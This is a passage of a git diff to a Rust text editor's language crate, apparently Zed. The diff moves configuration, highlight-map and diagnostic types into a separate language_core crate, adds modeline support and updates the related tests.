self.capability, + modeline: self.modeline.clone(), } } } @@ -5499,11 +5549,11 @@ impl<'a> BufferChunks<'a> { && range.start >= capture.node.start_byte() { let next_capture_end = capture.node.end_byte(); - if range.start < next_capture_end { - highlights.stack.push(( - next_capture_end, - highlights.highlight_maps[capture.grammar_index].get(capture.index), - )); + if range.start < next_capture_end + && let Some(capture_id) = + highlights.highlight_maps[capture.grammar_index].get(capture.index) + { + highlights.stack.push((next_capture_end, capture_id)); } highlights.next_capture.take(); } @@ -5638,9 +5688,11 @@ impl<'a> Iterator for BufferChunks<'a> { } else { let highlight_id = highlights.highlight_maps[capture.grammar_index].get(capture.index); - highlights - .stack - .push((capture.node.end_byte(), highlight_id)); + if let Some(highlight_id) = highlight_id { + highlights + .stack + .push((capture.node.end_byte(), highlight_id)); + } highlights.next_capture = highlights.captures.next(); } } @@ -5733,27 +5785,6 @@ impl operation_queue::Operation for Operation { } } -impl Default for Diagnostic { - fn default() -> Self { - Self { - source: Default::default(), - source_kind: DiagnosticSourceKind::Other, - code: None, - code_description: None, - severity: DiagnosticSeverity::ERROR, - message: Default::default(), - markdown: None, - group_id: 0, - is_primary: false, - is_disk_based: false, - is_unnecessary: false, - underline: true, - data: None, - registration_id: None, - } - } -} - impl IndentSize { /// Returns an [`IndentSize`] representing the given spaces. pub fn spaces(len: u32) -> Self { diff --git a/crates/language/src/buffer_tests.rs b/crates/language/src/buffer_tests.rs index 49d871cc860bb6df892b80ac433fb70264788664..9308ee6f0a0ee207b30be9e6fafa73ba9452d94c 100644 --- a/crates/language/src/buffer_tests.rs +++ b/crates/language/src/buffer_tests.rs @@ -246,6 +246,7 @@ async fn test_first_line_pattern(cx: &mut TestAppContext) { matcher: LanguageMatcher { path_suffixes: vec!["js".into()], first_line_pattern: Some(Regex::new(r"\bnode\b").unwrap()), + ..LanguageMatcher::default() }, ..Default::default() }); @@ -458,15 +459,18 @@ fn test_edit_events(cx: &mut gpui::App) { assert_eq!( mem::take(&mut *buffer_1_events.lock()), vec![ - BufferEvent::Edited, + BufferEvent::Edited { is_local: true }, BufferEvent::DirtyChanged, - BufferEvent::Edited, - BufferEvent::Edited, + BufferEvent::Edited { is_local: true }, + BufferEvent::Edited { is_local: true }, ] ); assert_eq!( mem::take(&mut *buffer_2_events.lock()), - vec![BufferEvent::Edited, BufferEvent::DirtyChanged] + vec![ + BufferEvent::Edited { is_local: false }, + BufferEvent::DirtyChanged + ] ); buffer1.update(cx, |buffer, cx| { @@ -481,11 +485,17 @@ fn test_edit_events(cx: &mut gpui::App) { }); assert_eq!( mem::take(&mut *buffer_1_events.lock()), - vec![BufferEvent::Edited, BufferEvent::DirtyChanged,] + vec![ + BufferEvent::Edited { is_local: true }, + BufferEvent::DirtyChanged, + ] ); assert_eq!( mem::take(&mut *buffer_2_events.lock()), - vec![BufferEvent::Edited, BufferEvent::DirtyChanged] + vec![ + BufferEvent::Edited { is_local: false }, + BufferEvent::DirtyChanged + ] ); } @@ -3237,7 +3247,7 @@ fn test_undo_after_merge_into_base(cx: &mut TestAppContext) { async fn test_preview_edits(cx: &mut TestAppContext) { cx.update(|cx| { init_settings(cx, |_| {}); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); }); let insertion_style = HighlightStyle { diff --git a/crates/language/src/diagnostic.rs b/crates/language/src/diagnostic.rs new file mode 100644 index 0000000000000000000000000000000000000000..951feec0da18582b56b361797efc0b346e7b2a04 --- /dev/null +++ b/crates/language/src/diagnostic.rs @@ -0,0 +1 @@ +pub use language_core::diagnostic::{Diagnostic, DiagnosticSourceKind}; diff --git a/crates/language/src/diagnostic_set.rs b/crates/language/src/diagnostic_set.rs index fa3263df48ff773b32332980e7341fa8a453ba4f..04564ecd6575f9470315e0571a60126c69d81d2b 100644 --- a/crates/language/src/diagnostic_set.rs +++ b/crates/language/src/diagnostic_set.rs @@ -326,23 +326,17 @@ impl DiagnosticEntry { } } -impl Default for Summary { - fn default() -> Self { - Self { - start: Anchor::MIN, - end: Anchor::MAX, - min_start: Anchor::MAX, - max_end: Anchor::MIN, - count: 0, - } - } -} - impl sum_tree::Summary for Summary { type Context<'a> = &'a text::BufferSnapshot; - fn zero(_cx: Self::Context<'_>) -> Self { - Default::default() + fn zero(buffer: &text::BufferSnapshot) -> Self { + Self { + start: Anchor::min_for_buffer(buffer.remote_id()), + end: Anchor::max_for_buffer(buffer.remote_id()), + min_start: Anchor::max_for_buffer(buffer.remote_id()), + max_end: Anchor::min_for_buffer(buffer.remote_id()), + count: 0, + } } fn add_summary(&mut self, other: &Self, buffer: Self::Context<'_>) { diff --git a/crates/language/src/highlight_map.rs b/crates/language/src/highlight_map.rs deleted file mode 100644 index ed9eb5d11d7bc4b156dc9bd660fb10a485129c3d..0000000000000000000000000000000000000000 --- a/crates/language/src/highlight_map.rs +++ /dev/null @@ -1,114 +0,0 @@ -use gpui::HighlightStyle; -use std::sync::Arc; -use theme::SyntaxTheme; - -#[derive(Clone, Debug)] -pub struct HighlightMap(Arc<[HighlightId]>); - -#[derive(Clone, Copy, Debug, PartialEq, Eq)] -pub struct HighlightId(pub u32); - -const DEFAULT_SYNTAX_HIGHLIGHT_ID: HighlightId = HighlightId(u32::MAX); - -impl HighlightMap { - pub(crate) fn new(capture_names: &[&str], theme: &SyntaxTheme) -> Self { - // For each capture name in the highlight query, find the longest - // key in the theme's syntax styles that matches all of the - // dot-separated components of the capture name. - HighlightMap( - capture_names - .iter() - .map(|capture_name| { - theme - .highlights - .iter() - .enumerate() - .filter_map(|(i, (key, _))| { - let mut len = 0; - let capture_parts = capture_name.split('.'); - for key_part in key.split('.') { - if capture_parts.clone().any(|part| part == key_part) { - len += 1; - } else { - return None; - } - } - Some((i, len)) - }) - .max_by_key(|(_, len)| *len) - .map_or(DEFAULT_SYNTAX_HIGHLIGHT_ID, |(i, _)| HighlightId(i as u32)) - }) - .collect(), - ) - } - - pub fn get(&self, capture_id: u32) -> HighlightId { - self.0 - .get(capture_id as usize) - .copied() - .unwrap_or(DEFAULT_SYNTAX_HIGHLIGHT_ID) - } -} - -impl HighlightId { - pub const TABSTOP_INSERT_ID: HighlightId = HighlightId(u32::MAX - 1); - pub const TABSTOP_REPLACE_ID: HighlightId = HighlightId(u32::MAX - 2); - - pub(crate) fn is_default(&self) -> bool { - *self == DEFAULT_SYNTAX_HIGHLIGHT_ID - } - - pub fn style(&self, theme: &SyntaxTheme) -> Option { - theme.highlights.get(self.0 as usize).map(|entry| entry.1) - } - - pub fn name<'a>(&self, theme: &'a SyntaxTheme) -> Option<&'a str> { - theme.highlights.get(self.0 as usize).map(|e| e.0.as_str()) - } -} - -impl Default for HighlightMap { - fn default() -> Self { - Self(Arc::new([])) - } -} - -impl Default for HighlightId { - fn default() -> Self { - DEFAULT_SYNTAX_HIGHLIGHT_ID - } -} - -#[cfg(test)] -mod tests { - use super::*; - use gpui::rgba; - - #[test] - fn test_highlight_map() { - let theme = SyntaxTheme { - highlights: [ - ("function", rgba(0x100000ff)), - ("function.method", rgba(0x200000ff)), - ("function.async", rgba(0x300000ff)), - ("variable.builtin.self.rust", rgba(0x400000ff)), - ("variable.builtin", rgba(0x500000ff)), - ("variable", rgba(0x600000ff)), - ] - .iter() - .map(|(name, color)| (name.to_string(), (*color).into())) - .collect(), - }; - - let capture_names = &[ - "function.special", - "function.async.rust", - "variable.builtin.self", - ]; - - let map = HighlightMap::new(capture_names, &theme); - assert_eq!(map.get(0).name(&theme), Some("function")); - assert_eq!(map.get(1).name(&theme), Some("function.async")); - assert_eq!(map.get(2).name(&theme), Some("variable.builtin")); - } -} diff --git a/crates/language/src/language.rs b/crates/language/src/language.rs index fd14f42a93179ae0423f5acfa6ede3cceec94935..43bbe7a08c73e476a41aec8af015464aa3af853d 100644 --- a/crates/language/src/language.rs +++ b/crates/language/src/language.rs @@ -7,11 +7,13 @@ //! //! Notably we do *not* assign a single language to a single file; in real world a single file can consist of multiple programming languages - HTML is a good example of that - and `language` crate tends to reflect that status quo in its API. mod buffer; +mod diagnostic; mod diagnostic_set; -mod highlight_map; mod language_registry; + pub mod language_settings; mod manifest; +pub mod modeline; mod outline; pub mod proto; mod syntax_map; @@ -22,17 +24,29 @@ mod toolchain; #[cfg(test)] pub mod buffer_tests; -use crate::language_settings::SoftWrap; -pub use crate::language_settings::{EditPredictionsMode, IndentGuideSettings}; +pub use crate::language_settings::{AutoIndentMode, EditPredictionsMode, IndentGuideSettings}; use anyhow::{Context as _, Result}; use async_trait::async_trait; -use collections::{HashMap, HashSet, IndexSet}; +use collections::{HashMap, HashSet}; use futures::Future; use futures::future::LocalBoxFuture; use futures::lock::OwnedMutexGuard; -use gpui::{App, AsyncApp, Entity, SharedString}; -pub use highlight_map::HighlightMap; +use gpui::{App, AsyncApp, Entity}; use http_client::HttpClient; + +pub use language_core::highlight_map::{HighlightId, HighlightMap}; + +pub use language_core::{ + BlockCommentConfig, BracketPair, BracketPairConfig, BracketPairContent, BracketsConfig, + BracketsPatternConfig, CodeLabel, CodeLabelBuilder, DebugVariablesConfig, DebuggerTextObject, + DecreaseIndentConfig, Grammar, GrammarId, HighlightsConfig, IndentConfig, InjectionConfig, + InjectionPatternConfig, JsxTagAutoCloseConfig, LanguageConfig, LanguageConfigOverride, + LanguageId, LanguageMatcher, OrderedListConfig, OutlineConfig, Override, OverrideConfig, + OverrideEntry, PromptResponseContext, RedactionConfig, RunnableCapture, RunnableConfig, + SoftWrap, Symbol, TaskListConfig, TextObject, TextObjectConfig, ToLspPosition, + WrapCharactersConfig, auto_indent_using_last_non_empty_line_default, deserialize_regex, + deserialize_regex_vec, regex_json_schema, regex_vec_json_schema, serialize_regex, +}; pub use language_registry::{ LanguageName, LanguageServerStatusUpdate, LoadedLanguage, ServerHealth, }; @@ -40,15 +54,13 @@ use lsp::{ CodeActionKind, InitializeParams, LanguageServerBinary, LanguageServerBinaryOptions, Uri, }; pub use manifest::{ManifestDelegate, ManifestName, ManifestProvider, ManifestQuery}; +pub use modeline::{ModelineSettings, parse_modeline}; use parking_lot::Mutex; use regex::Regex; -use schemars::{JsonSchema, SchemaGenerator, json_schema}; use semver::Version; -use serde::{Deserialize, Deserializer, Serialize, Serializer, de}; use serde_json::Value; use settings::WorktreeId; use smol::future::FutureExt as _; -use std::num::NonZeroU32; use std::{ ffi::OsStr, fmt::Debug, @@ -57,10 +69,7 @@ use std::{ ops::{DerefMut, Range}, path::{Path, PathBuf}, str, - sync::{ - Arc, LazyLock, - atomic::{AtomicUsize, Ordering::SeqCst}, - }, + sync::{Arc, LazyLock}, }; use syntax_map::{QueryCursorHandle, SyntaxSnapshot}; use task::RunnableTag; @@ -75,12 +84,12 @@ pub use toolchain::{ LanguageToolchainStore, LocalLanguageToolchainStore, Toolchain, ToolchainList, ToolchainLister, ToolchainMetadata, ToolchainScope, }; -use tree_sitter::{self, Query, QueryCursor, WasmStore, wasmtime}; +use tree_sitter::{self, QueryCursor, WasmStore, wasmtime}; use util::rel_path::RelPath; -use util::serde::default_true; pub use buffer::Operation; pub use buffer::*; +pub use diagnostic::{Diagnostic, DiagnosticSourceKind}; pub use diagnostic_set::{DiagnosticEntry, DiagnosticEntryRef, DiagnosticGroup}; pub use language_registry::{ AvailableLanguage, BinaryStatus, LanguageNotFound, LanguageQueries, LanguageRegistry, @@ -94,6 +103,16 @@ pub use syntax_map::{ pub use text::{AnchorRangeExt, LineEnding}; pub use tree_sitter::{Node, Parser, Tree, TreeCursor}; +pub(crate) fn to_settings_soft_wrap(value: language_core::SoftWrap) -> settings::SoftWrap { + match value { + language_core::SoftWrap::None => settings::SoftWrap::None, + language_core::SoftWrap::PreferLine => settings::SoftWrap::PreferLine, + language_core::SoftWrap::EditorWidth => settings::SoftWrap::EditorWidth, + language_core::SoftWrap::PreferredLineLength => settings::SoftWrap::PreferredLineLength, + language_core::SoftWrap::Bounded => settings::SoftWrap::Bounded, + } +} + static QUERY_CURSORS: Mutex> = Mutex::new(vec![]); static PARSERS: Mutex> = Mutex::new(vec![]); @@ -123,8 +142,6 @@ where func(cursor.deref_mut()) } -static NEXT_LANGUAGE_ID: AtomicUsize = AtomicUsize::new(0); -static NEXT_GRAMMAR_ID: AtomicUsize = AtomicUsize::new(0); static WASM_ENGINE: LazyLock = LazyLock::new(|| { wasmtime::Engine::new(&wasmtime::Config::new()).expect("Failed to create Wasmtime engine") }); @@ -138,6 +155,7 @@ pub static PLAIN_TEXT: LazyLock> = LazyLock::new(|| { matcher: LanguageMatcher { path_suffixes: vec!["txt".to_owned()], first_line_pattern: None, + modeline_aliases: vec!["text".to_owned(), "txt".to_owned()], }, brackets: BracketPairConfig { pairs: vec![ @@ -185,26 +203,12 @@ pub static PLAIN_TEXT: LazyLock> = LazyLock::new(|| { )) }); -/// Types that represent a position in a buffer, and can be converted into -/// an LSP position, to send to a language server. -pub trait ToLspPosition { - /// Converts the value into an LSP position. - fn to_lsp_position(self) -> lsp::Position; -} - #[derive(Debug, Clone, PartialEq, Eq, Hash)] pub struct Location { pub buffer: Entity, pub range: Range, } -#[derive(Debug, Clone)] -pub struct Symbol { - pub name: String, - pub kind: lsp::SymbolKind, - pub container_name: Option, -} - type ServerBinaryCache = futures::lock::Mutex>; type DownloadableLanguageServerBinary = LocalBoxFuture<'static, Result>; pub type LanguageServerBinaryLocations = LocalBoxFuture< @@ -289,14 +293,12 @@ impl CachedLspAdapter { &self, params: &mut lsp::PublishDiagnosticsParams, server_id: LanguageServerId, - existing_diagnostics: Option<&'_ Buffer>, ) { - self.adapter - .process_diagnostics(params, server_id, existing_diagnostics) + self.adapter.process_diagnostics(params, server_id) } - pub fn retain_old_diagnostic(&self, previous_diagnostic: &Diagnostic, cx: &App) -> bool { - self.adapter.retain_old_diagnostic(previous_diagnostic, cx) + pub fn retain_old_diagnostic(&self, previous_diagnostic: &Diagnostic) -> bool { + self.adapter.retain_old_diagnostic(previous_diagnostic) } pub fn underline_diagnostic(&self, diagnostic: &lsp::Diagnostic) -> bool { @@ -394,31 +396,14 @@ pub trait LspAdapterDelegate: Send + Sync { async fn try_exec(&self, binary: LanguageServerBinary) -> Result<()>; } -/// Context provided to LSP adapters when a user responds to a ShowMessageRequest prompt. -/// This allows adapters to intercept preference selections (like "Always" or "Never") -/// and potentially persist them to Zed's settings. -#[derive(Debug, Clone)] -pub struct PromptResponseContext { - /// The original message shown to the user - pub message: String, - /// The action (button) the user selected - pub selected_action: lsp::MessageActionItem, -} - #[async_trait(?Send)] pub trait LspAdapter: 'static + Send + Sync + DynLspInstaller { fn name(&self) -> LanguageServerName; - fn process_diagnostics( - &self, - _: &mut lsp::PublishDiagnosticsParams, - _: LanguageServerId, - _: Option<&'_ Buffer>, - ) { - } + fn process_diagnostics(&self, _: &mut lsp::PublishDiagnosticsParams, _: LanguageServerId) {} /// When processing new `lsp::PublishDiagnosticsParams` diagnostics, whether to retain previous one(s) or not. - fn retain_old_diagnostic(&self, _previous_diagnostic: &Diagnostic, _cx: &App) -> bool { + fn retain_old_diagnostic(&self, _previous_diagnostic: &Diagnostic) -> bool { false } @@ -491,6 +476,7 @@ pub trait LspAdapter: 'static + Send + Sync + DynLspInstaller { async fn initialization_options( self: Arc, _: &Arc, + _cx: &mut AsyncApp, ) -> Result> { Ok(None) } @@ -808,281 +794,6 @@ where } } -#[derive(Clone, Debug, Default, PartialEq, Eq)] -pub struct CodeLabel { - /// The text to display. - pub text: String, - /// Syntax highlighting runs. - pub runs: Vec<(Range, HighlightId)>, - /// The portion of the text that should be used in fuzzy filtering. - pub filter_range: Range, -} - -#[derive(Clone, Debug, Default, PartialEq, Eq)] -pub struct CodeLabelBuilder { - /// The text to display. - text: String, - /// Syntax highlighting runs. - runs: Vec<(Range, HighlightId)>, - /// The portion of the text that should be used in fuzzy filtering. - filter_range: Range, -} - -#[derive(Clone, Deserialize, JsonSchema, Debug)] -pub struct LanguageConfig { - /// Human-readable name of the language. - pub name: LanguageName, - /// The name of this language for a Markdown code fence block - pub code_fence_block_name: Option>, - // The name of the grammar in a WASM bundle (experimental). - pub grammar: Option>, - /// The criteria for matching this language to a given file. - #[serde(flatten)] - pub matcher: LanguageMatcher, - /// List of bracket types in a language. - #[serde(default)] - pub brackets: BracketPairConfig, - /// If set to true, auto indentation uses last non empty line to determine - /// the indentation level for a new line. - #[serde(default = "auto_indent_using_last_non_empty_line_default")] - pub auto_indent_using_last_non_empty_line: bool, - // Whether indentation of pasted content should be adjusted based on the context. - #[serde(default)] - pub auto_indent_on_paste: Option, - /// A regex that is used to determine whether the indentation level should be - /// increased in the following line. - #[serde(default, deserialize_with = "deserialize_regex")] - #[schemars(schema_with = "regex_json_schema")] - pub increase_indent_pattern: Option, - /// A regex that is used to determine whether the indentation level should be - /// decreased in the following line. - #[serde(default, deserialize_with = "deserialize_regex")] - #[schemars(schema_with = "regex_json_schema")] - pub decrease_indent_pattern: Option, - /// A list of rules for decreasing indentation. Each rule pairs a regex with a set of valid - /// "block-starting" tokens. When a line matches a pattern, its indentation is aligned with - /// the most recent line that began with a corresponding token. This enables context-aware - /// outdenting, like aligning an `else` with its `if`. - #[serde(default)] - pub decrease_indent_patterns: Vec, - /// A list of characters that trigger the automatic insertion of a closing - /// bracket when they immediately precede the point where an opening - /// bracket is inserted. - #[serde(default)] - pub autoclose_before: String, - /// A placeholder used internally by Semantic Index. - #[serde(default)] - pub collapsed_placeholder: String, - /// A line comment string that is inserted in e.g. `toggle comments` action. - /// A language can have multiple flavours of line comments. All of the provided line comments are - /// used for comment continuations on the next line, but only the first one is used for Editor::ToggleComments. - #[serde(default)] - pub line_comments: Vec>, - /// Delimiters and configuration for recognizing and formatting block comments. - #[serde(default)] - pub block_comment: Option, - /// Delimiters and configuration for recognizing and formatting documentation comments. - #[serde(default, alias = "documentation")] - pub documentation_comment: Option, - /// List markers that are inserted unchanged on newline (e.g., `- `, `* `, `+ `). - #[serde(default)] - pub unordered_list: Vec>, - /// Configuration for ordered lists with auto-incrementing numbers on newline (e.g., `1. ` becomes `2. `). - #[serde(default)] - pub ordered_list: Vec, - /// Configuration for task lists where multiple markers map to a single continuation prefix (e.g., `- [x] ` continues as `- [ ] `). - #[serde(default)] - pub task_list: Option, - /// A list of additional regex patterns that should be treated as prefixes - /// for creating boundaries during rewrapping, ensuring content from one - /// prefixed section doesn't merge with another (e.g., markdown list items). - /// By default, Zed treats as paragraph and comment prefixes as boundaries. - #[serde(default, deserialize_with = "deserialize_regex_vec")] - #[schemars(schema_with = "regex_vec_json_schema")] - pub rewrap_prefixes: Vec, - /// A list of language servers that are allowed to run on subranges of a given language. - #[serde(default)] - pub scope_opt_in_language_servers: Vec, - #[serde(default)] - pub overrides: HashMap, - /// A list of characters that Zed should treat as word characters for the - /// purpose of features that operate on word boundaries, like 'move to next word end' - /// or a whole-word search in buffer search. - #[serde(default)] - pub word_characters: HashSet, - /// Whether to indent lines using tab characters, as opposed to multiple - /// spaces. - #[serde(default)] - pub hard_tabs: Option, - /// How many columns a tab should occupy. - #[serde(default)] - #[schemars(range(min = 1, max = 128))] - pub tab_size: Option, - /// How to soft-wrap long lines of text. - #[serde(default)] - pub soft_wrap: Option, - /// When set, selections can be wrapped using prefix/suffix pairs on both sides. - #[serde(default)] - pub wrap_characters: Option, - /// The name of a Prettier parser that will be used for this language when no file path is available. - /// If there's a parser name in the language settings, that will be used instead. - #[serde(default)] - pub prettier_parser_name: Option, - /// If true, this language is only for syntax highlighting via an injection into other - /// languages, but should not appear to the user as a distinct language. - #[serde(default)] - pub hidden: bool, - /// If configured, this language contains JSX style tags, and should support auto-closing of those tags. - #[serde(default)] - pub jsx_tag_auto_close: Option, - /// A list of characters that Zed should treat as word characters for completion queries. - #[serde(default)] - pub completion_query_characters: HashSet, - /// A list of characters that Zed should treat as word characters for linked edit operations. - #[serde(default)] - pub linked_edit_characters: HashSet, - /// A list of preferred debuggers for this language. - #[serde(default)] - pub debuggers: IndexSet, - /// A list of import namespace segments that aren't expected to appear in file paths. For - /// example, "super" and "crate" in Rust. - #[serde(default)] - pub ignored_import_segments: HashSet>, - /// Regular expression that matches substrings to omit from import paths, to make the paths more - /// similar to how they are specified when imported. For example, "/mod\.rs$" or "/__init__\.py$". - #[serde(default, deserialize_with = "deserialize_regex")] - #[schemars(schema_with = "regex_json_schema")] - pub import_path_strip_regex: Option, -} - -#[derive(Clone, Debug, Deserialize, Default, JsonSchema)] -pub struct DecreaseIndentConfig { - #[serde(default, deserialize_with = "deserialize_regex")] - #[schemars(schema_with = "regex_json_schema")] - pub pattern: Option, - #[serde(default)] - pub valid_after: Vec, -} - -/// Configuration for continuing ordered lists with auto-incrementing numbers. -#[derive(Clone, Debug, Deserialize, JsonSchema)] -pub struct OrderedListConfig { - /// A regex pattern with a capture group for the number portion (e.g., `(\\d+)\\. `). - pub pattern: String, - /// A format string where `{1}` is replaced with the incremented number (e.g., `{1}. `). - pub format: String, -} - -/// Configuration for continuing task lists on newline. -#[derive(Clone, Debug, Deserialize, JsonSchema)] -pub struct TaskListConfig { - /// The list markers to match (e.g., `- [ ] `, `- [x] `). - pub prefixes: Vec>, - /// The marker to insert when continuing the list on a new line (e.g., `- [ ] `). - pub continuation: Arc, -} - -#[derive(Clone, Debug, Serialize, Deserialize, Default, JsonSchema)] -pub struct LanguageMatcher { - /// Given a list of `LanguageConfig`'s, the language of a file can be determined based on the path extension matching any of the `path_suffixes`. - #[serde(default)] - pub path_suffixes: Vec, - /// A regex pattern that determines whether the language should be assigned to a file or not. - #[serde( - default, - serialize_with = "serialize_regex", - deserialize_with = "deserialize_regex" - )] - #[schemars(schema_with = "regex_json_schema")] - pub first_line_pattern: Option, -} - -/// The configuration for JSX tag auto-closing. -#[derive(Clone, Deserialize, JsonSchema, Debug)] -pub struct JsxTagAutoCloseConfig { - /// The name of the node for a opening tag - pub open_tag_node_name: String, - /// The name of the node for an closing tag - pub close_tag_node_name: String, - /// The name of the node for a complete element with children for open and close tags - pub jsx_element_node_name: String, - /// The name of the node found within both opening and closing - /// tags that describes the tag name - pub tag_name_node_name: String, - /// Alternate Node names for tag names. - /// Specifically needed as TSX represents the name in `` - /// as `member_expression` rather than `identifier` as usual - #[serde(default)] - pub tag_name_node_name_alternates: Vec, - /// Some grammars are smart enough to detect a closing tag - /// that is not valid i.e. doesn't match it's corresponding - /// opening tag or does not have a corresponding opening tag - /// This should be set to the name of the node for invalid - /// closing tags if the grammar contains such a node, otherwise - /// detecting already closed tags will not work properly - #[serde(default)] - pub erroneous_close_tag_node_name: Option, - /// See above for erroneous_close_tag_node_name for details - /// This should be set if the node used for the tag name - /// within erroneous closing tags is different from the - /// normal tag name node name - #[serde(default)] - pub erroneous_close_tag_name_node_name: Option, -} - -/// The configuration for block comments for this language. -#[derive(Clone, Debug, JsonSchema, PartialEq)] -pub struct BlockCommentConfig { - /// A start tag of block comment. - pub start: Arc, - /// A end tag of block comment. - pub end: Arc, - /// A character to add as a prefix when a new line is added to a block comment. - pub prefix: Arc, - /// A indent to add for prefix and end line upon new line. - #[schemars(range(min = 1, max = 128))] - pub tab_size: u32, -} - -impl<'de> Deserialize<'de> for BlockCommentConfig { - fn deserialize(deserializer: D) -> Result - where - D: Deserializer<'de>, - { - #[derive(Deserialize)] - #[serde(untagged)] - enum BlockCommentConfigHelper { - New { - start: Arc, - end: Arc, - prefix: Arc, - tab_size: u32, - }, - Old([Arc; 2]), - } - - match BlockCommentConfigHelper::deserialize(deserializer)? { - BlockCommentConfigHelper::New { - start, - end, - prefix, - tab_size, - } => Ok(BlockCommentConfig { - start, - end, - prefix, - tab_size, - }), - BlockCommentConfigHelper::Old([start, end]) => Ok(BlockCommentConfig { - start, - end, - prefix: "".into(), - tab_size: 0, - }), - } - } -} - /// Represents a language for the given range. Some languages (e.g. HTML) /// interleave several languages together, thus a single buffer might actually contain /// several nested scopes. @@ -1092,147 +803,6 @@ pub struct LanguageScope { override_id: Option, } -#[derive(Clone, Deserialize, Default, Debug, JsonSchema)] -pub struct LanguageConfigOverride { - #[serde(default)] - pub line_comments: Override>>, - #[serde(default)] - pub block_comment: Override, - #[serde(skip)] - pub disabled_bracket_ixs: Vec, - #[serde(default)] - pub word_characters: Override>, - #[serde(default)] - pub completion_query_characters: Override>, - #[serde(default)] - pub linked_edit_characters: Override>, - #[serde(default)] - pub opt_into_language_servers: Vec, - #[serde(default)] - pub prefer_label_for_snippet: Option, -} - -#[derive(Clone, Deserialize, Debug, Serialize, JsonSchema)] -#[serde(untagged)] -pub enum Override { - Remove { remove: bool }, - Set(T), -} - -impl Default for Override { - fn default() -> Self { - Override::Remove { remove: false } - } -} - -impl Override { - fn as_option<'a>(this: Option<&'a Self>, original: Option<&'a T>) -> Option<&'a T> { - match this { - Some(Self::Set(value)) => Some(value), - Some(Self::Remove { remove: true }) => None, - Some(Self::Remove { remove: false }) | None => original, - } - } -} - -impl Default for LanguageConfig { - fn default() -> Self { - Self { - name: LanguageName::new_static(""), - code_fence_block_name: None, - grammar: None, - matcher: LanguageMatcher::default(), - brackets: Default::default(), - auto_indent_using_last_non_empty_line: auto_indent_using_last_non_empty_line_default(), - auto_indent_on_paste: None, - increase_indent_pattern: Default::default(), - decrease_indent_pattern: Default::default(), - decrease_indent_patterns: Default::default(), - autoclose_before: Default::default(), - line_comments: Default::default(), - block_comment: Default::default(), - documentation_comment: Default::default(), - unordered_list: Default::default(), - ordered_list: Default::default(), - task_list: Default::default(), - rewrap_prefixes: Default::default(), - scope_opt_in_language_servers: Default::default(), - overrides: Default::default(), - word_characters: Default::default(), - collapsed_placeholder: Default::default(), - hard_tabs: None, - tab_size: None, - soft_wrap: None, - wrap_characters: None, - prettier_parser_name: None, - hidden: false, - jsx_tag_auto_close: None, - completion_query_characters: Default::default(), - linked_edit_characters: Default::default(), - debuggers: Default::default(), - ignored_import_segments: Default::default(), - import_path_strip_regex: None, - } - } -} - -#[derive(Clone, Debug, Deserialize, JsonSchema)] -pub struct WrapCharactersConfig { - /// Opening token split into a prefix and suffix. The first caret goes - /// after the prefix (i.e., between prefix and suffix). - pub start_prefix: String, - pub start_suffix: String, - /// Closing token split into a prefix and suffix. The second caret goes - /// after the prefix (i.e., between prefix and suffix). - pub end_prefix: String, - pub end_suffix: String, -} - -fn auto_indent_using_last_non_empty_line_default() -> bool { - true -} - -fn deserialize_regex<'de, D: Deserializer<'de>>(d: D) -> Result, D::Error> { - let source = Option::::deserialize(d)?; - if let Some(source) = source { - Ok(Some(regex::Regex::new(&source).map_err(de::Error::custom)?)) - } else { - Ok(None) - } -} - -fn regex_json_schema(_: &mut schemars::SchemaGenerator) -> schemars::Schema { - json_schema!({ - "type": "string" - }) -} - -fn serialize_regex(regex: &Option, serializer: S) -> Result -where - S: Serializer, -{ - match regex { - Some(regex) => serializer.serialize_str(regex.as_str()), - None => serializer.serialize_none(), - } -} - -fn deserialize_regex_vec<'de, D: Deserializer<'de>>(d: D) -> Result, D::Error> { - let sources = Vec::::deserialize(d)?; - sources - .into_iter() - .map(|source| regex::Regex::new(&source)) - .collect::>() - .map_err(de::Error::custom) -} - -fn regex_vec_json_schema(_: &mut SchemaGenerator) -> schemars::Schema { - json_schema!({ - "type": "array", - "items": { "type": "string" } - }) -} - #[doc(hidden)] #[cfg(any(test, feature = "test-support"))] pub struct FakeLspAdapter { @@ -1255,79 +825,6 @@ pub struct FakeLspAdapter { >, } -/// Configuration of handling bracket pairs for a given language. -/// -/// This struct includes settings for defining which pairs of characters are considered brackets and -/// also specifies any language-specific scopes where these pairs should be ignored for bracket matching purposes. -#[derive(Clone, Debug, Default, JsonSchema)] -#[schemars(with = "Vec::")] -pub struct BracketPairConfig { - /// A list of character pairs that should be treated as brackets in the context of a given language. - pub pairs: Vec, - /// A list of tree-sitter scopes for which a given bracket should not be active. - /// N-th entry in `[Self::disabled_scopes_by_bracket_ix]` contains a list of disabled scopes for an n-th entry in `[Self::pairs]` - pub disabled_scopes_by_bracket_ix: Vec>, -} - -impl BracketPairConfig { - pub fn is_closing_brace(&self, c: char) -> bool { - self.pairs.iter().any(|pair| pair.end.starts_with(c)) - } -} - -#[derive(Deserialize, JsonSchema)] -pub struct BracketPairContent { - #[serde(flatten)] - pub bracket_pair: BracketPair, - #[serde(default)] - pub not_in: Vec, -} - -impl<'de> Deserialize<'de> for BracketPairConfig { - fn deserialize(deserializer: D) -> std::result::Result - where - D: Deserializer<'de>, - { - let result = Vec::::deserialize(deserializer)?; - let (brackets, disabled_scopes_by_bracket_ix) = result - .into_iter() - .map(|entry| (entry.bracket_pair, entry.not_in)) - .unzip(); - - Ok(BracketPairConfig { - pairs: brackets, - disabled_scopes_by_bracket_ix, - }) - } -} - -/// Describes a single bracket pair and how an editor should react to e.g. inserting -/// an opening bracket or to a newline character insertion in between `start` and `end` characters. -#[derive(Clone, Debug, Default, Deserialize, PartialEq, JsonSchema)] -pub struct BracketPair { - /// Starting substring for a bracket. - pub start: String, - /// Ending substring for a bracket. - pub end: String, - /// True if `end` should be automatically inserted right after `start` characters. - pub close: bool, - /// True if selected text should be surrounded by `start` and `end` characters. - #[serde(default = "default_true")] - pub surround: bool, - /// True if an extra newline should be inserted while the cursor is in the middle - /// of that bracket pair. - pub newline: bool, -} - -#[derive(Debug, PartialEq, Eq, PartialOrd, Ord, Hash, Clone, Copy)] -pub struct LanguageId(usize); - -impl LanguageId { - pub(crate) fn new() -> Self { - Self(NEXT_LANGUAGE_ID.fetch_add(1, SeqCst)) - } -} - pub struct Language { pub(crate) id: LanguageId, pub(crate) config: LanguageConfig, @@ -1337,184 +834,6 @@ pub struct Language { pub(crate) manifest_name: Option, } -#[derive(Debug, PartialEq, Eq, PartialOrd, Ord, Hash, Clone, Copy)] -pub struct 